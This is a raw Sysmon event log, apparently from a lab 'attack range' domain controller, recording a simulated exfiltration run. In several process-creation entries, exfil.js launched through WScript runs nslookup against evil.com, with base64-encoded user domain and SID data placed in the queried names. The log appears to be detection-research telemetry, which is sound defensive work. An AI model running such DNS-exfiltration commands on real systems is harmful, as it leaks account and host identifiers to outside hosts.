10341000x8000000000000000208866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9643-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-18E0-629A-6742-000000005F02}39761044C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9643-000000005F02}7552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.392{2E1864BB-18EB-629A-9643-000000005F02}7552C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmuhyp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.380{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrby.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.358{2E1864BB-18EB-629A-9443-000000005F02}75486124C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9543-000000005F02}8092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9543-000000005F02}8092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.342{2E1864BB-18EB-629A-9343-000000005F02}6960660C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-9543-000000005F02}8092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.355{2E1864BB-18EB-629A-9543-000000005F02}8092C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9343-000000005F02}6960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrby.tmp 2>&1 10341000x8000000000000000208850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.327{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9443-000000005F02}7548C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.327{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9443-000000005F02}7548C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.327{2E1864BB-18EB-629A-9443-000000005F02}75486124C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9343-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9443-000000005F02}7548C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9343-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.311{2E1864BB-18E0-629A-6742-000000005F02}39768016C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9343-000000005F02}6960C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.312{2E1864BB-18EB-629A-9343-000000005F02}6960C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrby.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.296{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaxq.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.280{2E1864BB-18EB-629A-9143-000000005F02}50841800C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9243-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 